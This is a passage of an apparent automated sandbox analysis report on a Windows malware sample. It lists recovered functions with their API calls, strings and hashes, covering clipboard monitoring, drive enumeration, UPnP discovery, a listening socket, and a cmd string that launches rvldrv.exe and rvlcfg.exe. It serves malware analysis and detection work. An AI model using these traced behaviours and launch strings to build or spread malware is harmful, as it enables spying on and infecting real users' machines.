                                                                                                                                                                                                      Function 004084F9 Relevance: 52.0, APIs: 34, Instructions: 1023COMMON
                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000003.00000002.1568181254.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000003.00000002.1568162964.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.1568200652.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.1568217713.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_5232.jbxd
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: _allshl_aullshr
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 673498613-0
                                                                                                                                                                                                      • Opcode ID: 8c609b86bb28d5a081a49b133891f2681c0e63e2cb5ef732c119ad65bfffb674
                                                                                                                                                                                                      • Instruction ID: affa05b9e3e18e999c7216c09a62115e88c49fe898542c2adc9745ce68515915
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8c609b86bb28d5a081a49b133891f2681c0e63e2cb5ef732c119ad65bfffb674
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 18D22A79D11619EFCB54CF99C18099EFBF1FF88320F62859AD845AB305C630AA95DF80
                                                                                                                                                                                                      Function 004059B0 Relevance: 25.7, APIs: 17, Instructions: 186clipboardregistryCOMMON
                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                      control_flow_graph 707 4059b0-4059d2 GetWindowLongW 708 4059d4-4059db 707->708 709 4059f6-4059fd 707->709 710 4059e1-4059e5 708->710 711 405a67-405a78 IsClipboardFormatAvailable 708->711 712 405a26-405a2c 709->712 713 4059ff 709->713 719 405a04-405a21 SetClipboardViewer SetWindowLongW 710->719 720 4059e7-4059eb 710->720 717 405a83-405a8d IsClipboardFormatAvailable 711->717 718 405a7a-405a81 711->718 715 405a46-405a4a 712->715 716 405a2e-405a44 SetWindowLongW 712->716 714 405be4-405bfd DefWindowProcA 713->714 721 405a62 715->721 722 405a4c-405a5c SendMessageA 715->722 716->721 724 405a98-405aa2 IsClipboardFormatAvailable 717->724 725 405a8f-405a96 717->725 723 405aab-405aaf 718->723 719->714 726 4059f1 720->726 727 405b9d-405bde RegisterRawInputDevices ChangeClipboardChain 720->727 721->714 722->721 729 405ab5-405abf OpenClipboard 723->729 730 405b7f-405b83 723->730 724->723 728 405aa4 724->728 725->723 726->714 727->714 728->723 729->730 733 405ac5-405ad6 GetClipboardData 729->733 731 405b85-405b95 SendMessageA 730->731 732 405b9b 730->732 731->732 732->714 734 405ad8 733->734 735 405add-405aee GlobalLock 733->735 734->714 736 405af0 735->736 737 405af5-405b06 735->737 736->714 738 405b08-405b0c 737->738 739 405b29-405b3c call 40d250 737->739 740 405b3e-405b4e call 4057f0 738->740 741 405b0e-405b12 738->741 747 405b51-405b65 GlobalUnlock CloseClipboard 739->747 740->747 743 405b14 741->743 744 405b16-405b27 call 405680 741->744 743->747 744->747 747->730 750 405b67-405b7c call 404970 call 40ab60 747->750 750->730
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GetWindowLongW.USER32(?,000000EB), ref: 004059BC
                                                                                                                                                                                                      • SetClipboardViewer.USER32(?), ref: 00405A08
                                                                                                                                                                                                      • SetWindowLongW.USER32(?,000000EB,?), ref: 00405A1B
                                                                                                                                                                                                      • IsClipboardFormatAvailable.USER32(0000000D), ref: 00405A70
                                                                                                                                                                                                      • OpenClipboard.USER32(00000000), ref: 00405AB7
                                                                                                                                                                                                      • GetClipboardData.USER32(00000000), ref: 00405AC9
                                                                                                                                                                                                      • RegisterRawInputDevices.USER32(?,00000001,0000000C), ref: 00405BD0
                                                                                                                                                                                                      • ChangeClipboardChain.USER32(?,?), ref: 00405BDE
                                                                                                                                                                                                      • DefWindowProcA.USER32(?,?,?,?), ref: 00405BF4
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000003.00000002.1568181254.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000003.00000002.1568162964.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.1568200652.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.1568217713.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_5232.jbxd
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Clipboard$Window$Long$AvailableChainChangeDataDevicesFormatInputOpenProcRegisterViewer
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 3549449529-0
                                                                                                                                                                                                      • Opcode ID: 2f0b22ba391b773d4c45c64ac6dadd066d7720e91bacc99fadb97576ecf3cd51
                                                                                                                                                                                                      • Instruction ID: 96d86bc259bd628418629a5c2f452591d45261003c5ffeff5fe086a58ca8b5ae
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2f0b22ba391b773d4c45c64ac6dadd066d7720e91bacc99fadb97576ecf3cd51
                                                                                                                                                                                                      • Instruction Fuzzy Hash: EB711C75A00608EFDF14DFA4D988BEF77B4EB48300F14856AE506B7290D779AA40CF69
                                                                                                                                                                                                      Function 004067A0 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 85filestringCOMMON
                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                      control_flow_graph 756 4067a0-4067ef CreateDirectoryW wsprintfW FindFirstFileW 757 4067f5-406809 lstrcmpW 756->757 758 4068cf-4068d2 756->758 759 406821 757->759 760 40680b-40681f lstrcmpW 757->760 761 40689c-4068b2 FindNextFileW 759->761 760->759 762 406823-40686c wsprintfW * 2 760->762 761->757 765 4068b8-4068c9 FindClose RemoveDirectoryW 761->765 763 406886-406896 MoveFileExW 762->763 764 40686e-406884 call 4067a0 762->764 763->761 764->761 765->758
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • CreateDirectoryW.KERNEL32(00406F1A,00000000), ref: 004067AF
                                                                                                                                                                                                      • wsprintfW.USER32 ref: 004067C5
                                                                                                                                                                                                      • FindFirstFileW.KERNEL32(?,?), ref: 004067DC
                                                                                                                                                                                                      • lstrcmpW.KERNEL32(?,00411368), ref: 00406801
                                                                                                                                                                                                      • lstrcmpW.KERNEL32(?,0041136C), ref: 00406817
                                                                                                                                                                                                      • wsprintfW.USER32 ref: 0040683A
                                                                                                                                                                                                      • wsprintfW.USER32 ref: 0040685A
                                                                                                                                                                                                      • MoveFileExW.KERNEL32(?,?,00000009), ref: 00406896
                                                                                                                                                                                                      • FindNextFileW.KERNEL32(000000FF,?), ref: 004068AA
                                                                                                                                                                                                      • FindClose.KERNEL32(000000FF), ref: 004068BF
                                                                                                                                                                                                      • RemoveDirectoryW.KERNEL32(?), ref: 004068C9
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000003.00000002.1568181254.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000003.00000002.1568162964.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.1568200652.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.1568217713.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_5232.jbxd
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: FileFindwsprintf$Directorylstrcmp$CloseCreateFirstMoveNextRemove
                                                                                                                                                                                                      • String ID: %s\%s$%s\%s$%s\*
                                                                                                                                                                                                      • API String ID: 92872011-445461498
                                                                                                                                                                                                      • Opcode ID: e29d1c6c13065a126f61562b4b6d2eaef25e121113ba2b4fb370d418db62171d
                                                                                                                                                                                                      • Instruction ID: 96f5080d1998a7d60275ba97af61759e4b4e94f5b4bc08b7936e0b3de653678a
                                                                                                                                                                                                      • Opcode Fuzzy Hash: e29d1c6c13065a126f61562b4b6d2eaef25e121113ba2b4fb370d418db62171d
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 923145B5900218AFDB10DBA0DC88FDA7778BB48701F40C5E9F609A3195DA75EAD4CF98
                                                                                                                                                                                                      Function 00406F70 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 106sleepthreadCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • Sleep.KERNEL32(000003E8), ref: 00406F7E
                                                                                                                                                                                                      • GetModuleFileNameW.KERNEL32(00000000,00415DB8,00000104), ref: 00406F90
                                                                                                                                                                                                        • Part of subcall function 0040F1F0: CreateFileW.KERNEL32(00406FA0,80000000,00000001,00000000,00000003,00000000,00000000,00406FA0), ref: 0040F210
                                                                                                                                                                                                        • Part of subcall function 0040F1F0: GetFileSize.KERNEL32(000000FF,00000000), ref: 0040F225
                                                                                                                                                                                                        • Part of subcall function 0040F1F0: CloseHandle.KERNEL32(000000FF), ref: 0040F232
                                                                                                                                                                                                      • ExitThread.KERNEL32 ref: 004070FA
                                                                                                                                                                                                        • Part of subcall function 004063E0: GetLogicalDrives.KERNEL32 ref: 004063E6
                                                                                                                                                                                                        • Part of subcall function 004063E0: RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer,00000000,00020019,?), ref: 00406434
                                                                                                                                                                                                        • Part of subcall function 004063E0: RegQueryValueExW.ADVAPI32(?,NoDrives,00000000,00000000,00000000,00000004), ref: 00406461
                                                                                                                                                                                                        • Part of subcall function 004063E0: RegCloseKey.ADVAPI32(?), ref: 0040647E
                                                                                                                                                                                                      • Sleep.KERNEL32(000007D0), ref: 004070ED
                                                                                                                                                                                                        • Part of subcall function 00406300: lstrcpyW.KERNEL32(?,?,?,?,00000019), ref: 00406353
                                                                                                                                                                                                      • GetVolumeInformationW.KERNEL32(?,?,00000105,00000000,00000000,?,00000000,00000000), ref: 0040702F
                                                                                                                                                                                                      • GetDiskFreeSpaceExW.KERNEL32(?,00000000,?,00000000), ref: 00407044
                                                                                                                                                                                                      • _aulldiv.NTDLL(?,?,40000000,00000000), ref: 0040705F
                                                                                                                                                                                                      • wsprintfW.USER32 ref: 00407072
                                                                                                                                                                                                      • wsprintfW.USER32 ref: 00407092
                                                                                                                                                                                                      • wsprintfW.USER32 ref: 004070B5
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000003.00000002.1568181254.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000003.00000002.1568162964.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.1568200652.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.1568217713.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_5232.jbxd
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Filewsprintf$CloseSleep$CreateDiskDrivesExitFreeHandleInformationLogicalModuleNameOpenQuerySizeSpaceThreadValueVolume_aulldivlstrcpy
                                                                                                                                                                                                      • String ID: (%dGB)$%s%s$Unnamed volume
                                                                                                                                                                                                      • API String ID: 1650488544-2117135753
                                                                                                                                                                                                      • Opcode ID: 36835f4b582c7264fa9310f82983a243ead37fe316eb445b52cb330bcd55ef35
                                                                                                                                                                                                      • Instruction ID: b797a4b926279b24144ff746e96c568fb56fd9e530b7e1178aba5a8e6206bca3
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 36835f4b582c7264fa9310f82983a243ead37fe316eb445b52cb330bcd55ef35
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 244174B1D00214BBEB64DB94DC45FEE7779BB48700F1085A6F20AB61D0DA785B84CF6A
                                                                                                                                                                                                      Function 0040E190 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 117networkstringCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • socket.WS2_32(00000002,00000002,00000011), ref: 0040E1AA
                                                                                                                                                                                                      • htons.WS2_32(0000076C), ref: 0040E1E0
                                                                                                                                                                                                      • inet_addr.WS2_32(239.255.255.250), ref: 0040E1EF
                                                                                                                                                                                                      • setsockopt.WS2_32(000000FF,0000FFFF,00000020,00000001,00000001), ref: 0040E20D
                                                                                                                                                                                                        • Part of subcall function 0040B430: htons.WS2_32(00000050), ref: 0040B45D
                                                                                                                                                                                                        • Part of subcall function 0040B430: socket.WS2_32(00000002,00000001,00000000), ref: 0040B47D
                                                                                                                                                                                                        • Part of subcall function 0040B430: connect.WS2_32(000000FF,?,00000010), ref: 0040B496
                                                                                                                                                                                                        • Part of subcall function 0040B430: getsockname.WS2_32(000000FF,?,00000010), ref: 0040B4C8
                                                                                                                                                                                                      • bind.WS2_32(000000FF,?,00000010), ref: 0040E243
                                                                                                                                                                                                      • lstrlenA.KERNEL32(X#A,00000000,?,00000010), ref: 0040E25C
                                                                                                                                                                                                      • sendto.WS2_32(000000FF,X#A,00000000), ref: 0040E26B
                                                                                                                                                                                                      • ioctlsocket.WS2_32(000000FF,8004667E,00000001), ref: 0040E285
                                                                                                                                                                                                        • Part of subcall function 0040E310: recvfrom.WS2_32(000000FF,?,00000400,00000000,00000000,00000000), ref: 0040E35E
                                                                                                                                                                                                        • Part of subcall function 0040E310: Sleep.KERNEL32(000003E8), ref: 0040E36E
                                                                                                                                                                                                        • Part of subcall function 0040E310: StrCmpNIA.SHLWAPI(?,HTTP/1.1 200 OK,0000000F), ref: 0040E38B
                                                                                                                                                                                                        • Part of subcall function 0040E310: StrStrIA.SHLWAPI(?,LOCATION: ), ref: 0040E3A1
                                                                                                                                                                                                        • Part of subcall function 0040E310: StrChrA.SHLWAPI(?,0000000D), ref: 0040E3CE
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000003.00000002.1568181254.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000003.00000002.1568162964.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.1568200652.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.1568217713.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_5232.jbxd
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: htonssocket$Sleepbindconnectgetsocknameinet_addrioctlsocketlstrlenrecvfromsendtosetsockopt
                                                                                                                                                                                                      • String ID: 239.255.255.250$X#A
                                                                                                                                                                                                      • API String ID: 726339449-2206458040
                                                                                                                                                                                                      • Opcode ID: 6911e90d37da8db62bd51864f6155ca9886bbc89aad1387f27fc75aef26ea545
                                                                                                                                                                                                      • Instruction ID: e8e0ae0e245dd7c097b927a75a8676c49a2f7ecfee9f68fb0cb72d84dadb0e27
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6911e90d37da8db62bd51864f6155ca9886bbc89aad1387f27fc75aef26ea545
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7F4119B4E00208ABDB04DFE4D989BEEBBB5EF48304F108569F505B7390E7B55A44CB59
                                                                                                                                                                                                      Function 00402020 Relevance: 16.6, APIs: 11, Instructions: 131networkCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GetSystemInfo.KERNEL32(?,?), ref: 00402043
                                                                                                                                                                                                      • InitializeCriticalSection.KERNEL32(00000020), ref: 00402057
                                                                                                                                                                                                      • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 00402065
                                                                                                                                                                                                      • CreateIoCompletionPort.KERNEL32(000000FF,00000000,00000000,00000000), ref: 0040207E
                                                                                                                                                                                                        • Part of subcall function 0040DBB0: InitializeCriticalSection.KERNEL32(-00000004), ref: 0040DBCE
                                                                                                                                                                                                      • WSASocketA.WS2_32(00000002,00000001,00000006,00000000,00000000,00000001), ref: 004020AB
                                                                                                                                                                                                      • setsockopt.WS2_32 ref: 004020D1
                                                                                                                                                                                                      • htons.WS2_32(?), ref: 00402101
                                                                                                                                                                                                      • bind.WS2_32(?,0000FFFF,00000010), ref: 00402117
                                                                                                                                                                                                      • listen.WS2_32(?,7FFFFFFF), ref: 0040212F
                                                                                                                                                                                                      • WSACreateEvent.WS2_32 ref: 0040213A
                                                                                                                                                                                                      • WSAEventSelect.WS2_32(?,00000000,00000008), ref: 0040214E
                                                                                                                                                                                                        • Part of subcall function 0040DBE0: EnterCriticalSection.KERNEL32(-00000004,00000000), ref: 0040DC04
                                                                                                                                                                                                        • Part of subcall function 0040DBE0: CreateThread.KERNEL32(00000000,?,00000000,?,00000000,?), ref: 0040DC5F
                                                                                                                                                                                                        • Part of subcall function 0040DBE0: GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002), ref: 0040DC9C
                                                                                                                                                                                                        • Part of subcall function 0040DBE0: GetCurrentProcess.KERNEL32(00000000,00000000), ref: 0040DCA7
                                                                                                                                                                                                        • Part of subcall function 0040DBE0: DuplicateHandle.KERNEL32(00000000), ref: 0040DCAE
                                                                                                                                                                                                        • Part of subcall function 0040DBE0: LeaveCriticalSection.KERNEL32(-00000004), ref: 0040DCC2
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000003.00000002.1568181254.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000003.00000002.1568162964.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.1568200652.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.1568217713.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_5232.jbxd
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: CreateCriticalSection$Event$CurrentInitializeProcess$CompletionDuplicateEnterHandleInfoLeavePortSelectSocketSystemThreadbindhtonslistensetsockopt
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 1603358586-0
                                                                                                                                                                                                      • Opcode ID: 12e9ac71e1e64606d6e310d867efcd3aad974152cf34b1f89b4218bf20e906ed
                                                                                                                                                                                                      • Instruction ID: 7304e093e5df1f4af0f3941d52a0ba2ce6ba101da239ecb0b9d238ba0c2be26e
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 12e9ac71e1e64606d6e310d867efcd3aad974152cf34b1f89b4218bf20e906ed
                                                                                                                                                                                                      • Instruction Fuzzy Hash: EE41B170640301ABD3209F74CC4AF5B77E4AF44720F108A2DF6A9EA2D4E7F4E545875A
                                                                                                                                                                                                      Function 00406660 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 106comCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • CoInitialize.OLE32(00000000), ref: 0040666B
                                                                                                                                                                                                      • CoCreateInstance.OLE32(00413030,00000000,00000001,00413010,00000008), ref: 00406683
                                                                                                                                                                                                      • wsprintfW.USER32 ref: 004066C4
                                                                                                                                                                                                      • wsprintfW.USER32 ref: 004066E5
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      • /c start %s & start %s\rvldrv.exe & start %s\rvlcfg.exe, xrefs: 004066B8
                                                                                                                                                                                                      • %comspec%, xrefs: 004066EE
                                                                                                                                                                                                      • cl@, xrefs: 004066A0
                                                                                                                                                                                                      • /c start %s & start %s\rvlcfg.exe, xrefs: 004066D9
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000003.00000002.1568181254.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000003.00000002.1568162964.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.1568200652.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.1568217713.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_5232.jbxd
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: wsprintf$CreateInitializeInstance
                                                                                                                                                                                                      • String ID: %comspec%$/c start %s & start %s\rvlcfg.exe$/c start %s & start %s\rvldrv.exe & start %s\rvlcfg.exe$cl@
                                                                                                                                                                                                      • API String ID: 1147330536-497122036
                                                                                                                                                                                                      • Opcode ID: eee1a2fc8572b98f6c40a5fc3c9db374d26e8a3e47ee9b9990b59bb952fb1ff2
                                                                                                                                                                                                      • Instruction ID: e126a915917d584c7bd6e3cca15df18ca7e9be12ab45cc4692bb8e15b90f0fb7
                                                                                                                                                                                                      • Opcode Fuzzy Hash: eee1a2fc8572b98f6c40a5fc3c9db374d26e8a3e47ee9b9990b59bb952fb1ff2
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 67411D75A40208AFC704DF98C885FDEB7B5AF88704F208199F515A72A5C675AE81CB54
                                                                                                                                                                                                      Function 00401470 Relevance: 9.1, APIs: 6, Instructions: 89networkthreadCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 004014B2
                                                                                                                                                                                                      • socket.WS2_32(00000002,00000002,00000011), ref: 004014C1
                                                                                                                                                                                                      • htons.WS2_32(?), ref: 00401508
                                                                                                                                                                                                      • setsockopt.WS2_32(?,0000FFFF), ref: 0040152A
                                                                                                                                                                                                      • bind.WS2_32(?,?,00000010), ref: 0040153B
                                                                                                                                                                                                        • Part of subcall function 00401330: SetEvent.KERNEL32(?,00000000,?,0040154C,00000000), ref: 00401346
                                                                                                                                                                                                        • Part of subcall function 00401330: WaitForSingleObject.KERNEL32(?,000000FF), ref: 00401352
                                                                                                                                                                                                        • Part of subcall function 00401330: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040135C
                                                                                                                                                                                                      • CreateThread.KERNEL32(00000000,00000000,00401100,00000000,00000000,00000000), ref: 00401569
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000003.00000002.1568181254.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000003.00000002.1568162964.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.1568200652.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.1568217713.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_5232.jbxd
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: CreateEvent$CloseHandleObjectSingleThreadWaitbindhtonssetsockoptsocket
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 4174406920-0
                                                                                                                                                                                                      • Opcode ID: 93d4027be7e49e3bb9003fc5ae654a5e9afe1d061a8d67f74f828f69ef3a14c4
                                                                                                                                                                                                      • Instruction ID: 62ed05d6da85abd953b38b2f92cd08377c0ec6205023cd889ce16e316194a11c
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 93d4027be7e49e3bb9003fc5ae654a5e9afe1d061a8d67f74f828f69ef3a14c4
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1731F971A443016BE320DF749C46F9BB6E0AF48B10F40493DF659EB2D0D3B4D544879A
                                                                                                                                                                                                      Function 0040D770 Relevance: 9.1, APIs: 6, Instructions: 67sleepnetworkCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 0040D782
                                                                                                                                                                                                      • ioctlsocket.WS2_32(00000004,4004667F,00000000), ref: 0040D7A8
                                                                                                                                                                                                      • recv.WS2_32(00000004,00002710,000000FF,00000000), ref: 0040D7DF
                                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 0040D7F4
                                                                                                                                                                                                      • Sleep.KERNEL32(00000001), ref: 0040D814
                                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 0040D81A
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000003.00000002.1568181254.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000003.00000002.1568162964.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.1568200652.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.1568217713.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_5232.jbxd
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: CountTick$Sleepioctlsocketrecv
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 107502007-0
                                                                                                                                                                                                      • Opcode ID: 37a822bdddda98564e28443683f910c137df2279eb61dd0ccc6bd5f83a2e5522
                                                                                                                                                                                                      • Instruction ID: 457d80db37ae817004d1223b894239af033459ee6c7143085fc0b5fbd1cdb933
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 37a822bdddda98564e28443683f910c137df2279eb61dd0ccc6bd5f83a2e5522
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 13310A75D00209EFCB04DFA4D948AEEBBB0FF44315F10866AE821A7280D7749A54CB99
                                                                                                                                                                                                      Function 0040B430 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 60networkCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • htons.WS2_32(00000050), ref: 0040B45D
                                                                                                                                                                                                        • Part of subcall function 0040B3F0: inet_addr.WS2_32(0040B471), ref: 0040B3FA
                                                                                                                                                                                                        • Part of subcall function 0040B3F0: gethostbyname.WS2_32(?), ref: 0040B40D
                                                                                                                                                                                                      • socket.WS2_32(00000002,00000001,00000000), ref: 0040B47D
                                                                                                                                                                                                      • connect.WS2_32(000000FF,?,00000010), ref: 0040B496
                                                                                                                                                                                                      • getsockname.WS2_32(000000FF,?,00000010), ref: 0040B4C8
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      • www.update.microsoft.com, xrefs: 0040B467
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000003.00000002.1568181254.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000003.00000002.1568162964.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.1568200652.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.1568217713.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_5232.jbxd
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: connectgethostbynamegetsocknamehtonsinet_addrsocket
